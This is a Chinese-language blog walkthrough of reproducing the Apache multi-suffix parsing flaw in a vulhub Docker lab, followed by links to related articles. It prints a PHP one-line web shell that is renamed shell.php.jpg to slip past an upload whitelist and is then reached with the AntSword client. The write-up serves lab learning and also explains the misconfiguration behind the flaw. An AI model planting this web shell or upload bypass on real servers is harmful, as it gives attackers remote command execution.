Apache多后缀名解析漏洞复现(vulhub)

最新推荐文章于 2024-04-12 01:35:10 发布
最新推荐文章于 2024-04-12 01:35:10 发布
阅读量528 收藏 1
点赞数 4
文章标签: apache 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51398553/article/details/131233623
版权
文章介绍了Apache服务器的0x00漏洞原理,该漏洞允许上传以.php为隐藏后缀的文件,如shell.php.jpg,导致文件被当作PHP脚本执行。实验展示了在Kali和CentOS靶机环境中,如何利用此漏洞上传一句话木马并成功连接。
摘要由CSDN通过智能技术生成

0x00 漏洞原理

Apache默认一个文件可以有多个以点分割的后缀,Apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别。例如一个文件名为test.jpg.abc,Apache会先从最右边开始识别,也就是会先识别.abc,apache无法识别.abc,继而往左继续识别,发现是.jpg,Apache可以识别,因此会将其识别为图片文件。

0x01 产生原因

配置Apache时,对于Apache配置不熟练,配置命令不清楚,在配置PHP文件处理程序时,配置命令存在问题:位于漏洞环境目录的 conf/docker-php.conf里的配置命令。

AddHandler application/x-httpd-php .php

该命令会将后缀中只要含有.php的文件都会被当作php程序解析。

 查看网页的源代码

 从源代码中可以看出,该网站只允许上传以gif,png,jpg和jpeg为后缀的文件。但由于Apache存在多后缀名解析漏洞,因此我们可以上传一个名为shell.php.jpg的文件,该文件以.jpg在最后的后缀,因此可以上传到网站;又有该文件存在.php,因此最终该文件会被当作php文件执行。

0x02 实验设备

攻击机:kali(192.168.111.139),win11(10.17.42.114)

靶机:centos7(192.168.111.140)

0x03 实验步骤

1. 进入靶场,拉取镜像,并查看服务相关信息。

cd vulhub/httpd/apache_parsing_vulnerability    //进入靶场
docker-compose up -d    //拉取镜像
docker ps    //查看服务相关信息

 可以看到服务的端口号为80。

2. 从本机中访问该服务。

 

3.选择php的一句话木马文件,并将其重命名为shell.php.jpg,然后上传。

<?php @eval($_POST['cmd']); ?>

网页显示上传成功,并且服务中也确实存在该文件

 

 注:进入服务终端的732f89728c1是容器ID,可以通过docker ps命令查看。

4. 尝试使用蚁剑进行连接(连接的url是http://192.168.111.140/uploadfiles/shell.php.jpg,而不是从/var开始)。

连接成功!

 

leoet18
关注
3. Apache httpd 安全加固之多后缀名解析漏洞
薛定谔嘚喵博客
03-31 673
Apache httpd 安全加固之多后缀名解析漏洞 漏洞原理:在有多个后缀的情况下,只要一个文件含有.php后缀文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞
Apache HTTPD 多后缀解析漏洞复现
记录笔记
04-15 2767
Apache HTTPD 多后缀解析漏洞复现 Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞 由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀文件即将被识别
Apache文件解析漏洞
@小张小张的博客
10-19 2871
Apache解析漏洞 风险级别:高风险 风险描述:Apache解析文件时当遇到无法识别的扩展名时,将会从后向前解析,直到遇到识别的扩展名为止 风险分析:在控制上传文件时,判断文件名是否是PHP、ASP、ASPX、ASA、CER、ASPX等脚本扩展名,如果是,则不允许上传,防止攻击者上传1.php.rar等扩展名来绕过程序检测,配合解析漏洞,得到webshell; 解析漏洞主要存在于三大WEB服务程序,分别是IIS、NGINX和Apache。 IIS6.0下主要是有两个解析漏洞一个是目录解析,如/x
Apache后缀解析漏洞复现apache_parsing_vulnerability)
爱吃仡坨的Blog
10-13 2249
apahe解析文件时候有一特性,Apache默认一个文件可以有多个以点分割后缀apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别如果运维人员给.php后缀文件添加了处理程序 `AddHandler application/x-httpd-php .php` 那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为PHP文件进行解析。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞,
Apache 后缀解析漏洞
guishengyx的博客
10-19 425
vulfocus靶场
漏洞复现apache解析漏洞
千寻的博客
08-21 3059
文章目录文件上传-apache解析漏洞原理实验内容漏洞防御免责声明 文件上传-apache解析漏洞 原理 Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断。 比如xxx.php.rar对apache来说 rar是不可解析的,所以就会解析成xxx.php。 Apache并不认识rar后缀名,对它来说会看成test.php。解析成功。 其实漏洞的关键就是apache的"合法后缀",不是"合法后缀"的都可以被非法利用 实验内容 1、访问靶场出现如下界面。进入长传作
06 - vulhub - Apache HTTPD 多后缀解析漏洞
最新发布
2301_82241859的博客
04-12 845
漏洞原理漏洞复现漏洞利用验证漏洞利用是否成功修复建议漏洞名称:Apache HTTPD 多后缀解析漏洞简介:httpd是Apache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程,它会建立一个处理请求的子进程或线程的池。Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件。比如,如下配置文件:AddType text/html .htmlAddLanguage zh-CN .cn其
漏洞复现Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1349
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
weixin_64655821的博客
10-13 2150
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
[中间件漏洞]apache漏洞复现
紫洋的博客
05-25 1276
其2.4.0~2.4.29版本存在 一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。Apache默认一个文件可以有多个以点分割后缀,当最右边的后缀无法识别,则继续向左识别,直到识别到合法后缀才进行解析。最后一个后缀名为.jpg,合法,因为文件名info.php.jpg中包含.php,所以解析为php文件。在有多个后缀的情况下,只要包含.php后缀文件就会被识别出php文件进行解析,不需要是最后一个后缀。先创建文件文件内容为phpinfo。
Apache后缀名解析漏洞分析和防御方法
09-15
主要介绍了Apache后缀名解析漏洞分析和防御方法,后缀解析漏洞通常通过伪造PHP后辍,来上传文件到服务器中,很致命的一漏洞,需要的朋友可以参考下
apache解析漏洞
cxrpty的博客
02-17 1196
实验环境:Apache 实验原理:Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.a.b的“.a”和”.b” 这两种后缀apache不可识别解析,apache就会把test.php.a.b解析成test.php。 实验步骤: 本身存在漏洞: 1.新建一个phpinfo.php.aaa文件,并编辑其内容为下面内容 ...
11-3 Apache后缀解析漏洞分析
weixin_43263566的博客
11-24 1641
漏洞与用户的配置有密切的关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到 Apache 解析文件的特性。在默认情况下,Apache 允许一个文件具有多个以点分割后缀,在处理文件时会从右向左识别后缀名。(就是右边的后缀名无法识别,则继续识别左边的)如果运维人员给具有 .php 后缀文件添加了处理程序 AddHandler application/x-httpd-php .php,那么在文件具有多个后缀的情况下,只要文件含有 .php 后缀,该文件就会被识别为 PHP 文件并进行解析
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 3592
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
描述apache和iis文件解析漏洞的原理,以及如何修复apache文件解析漏洞和iis解析漏洞
weixin_57108799的博客
02-26 621
apache与iis文件解析漏洞原理
Apache HTTPD 多后缀解析漏洞
qq_46081990的博客
05-28 278
Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。该漏洞并不是 Apache 程序本身的问题,而是管理员配置不当造成。如果运维人员给 .php 后缀增加了处理器。那么,在有多个后缀的情况下,只要一个文件含有 .php 后缀文件即将被识别成 PHP 文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞
vulhub中的Apache HTTPD 多后缀解析漏洞详解
qq_59020256的博客
01-04 803
这里需要注意路径,如果你没有执行成功make和make install那么你这里的/bin/python3 路径便会不存在,所有一定要切换到/usr/local/python3/bin/python3进行查看是否存在。这里我就遇到了因为版本过低而执行不了docker-compose up -d的情况。因为我在1.php.jpg中写入的是phpinfo()文件则会执行phpinfo。这里python版本很重要,因为版本过低可能会导致后面的结果运行不成功。(2)创建python3文件夹,存放编译后的下载包。
【中间件漏洞Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 897
①CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞 ④CVE-2021-41773 ⑤CVE-2021-42013 ⑥CVE-2021-40438
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

leoet18

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值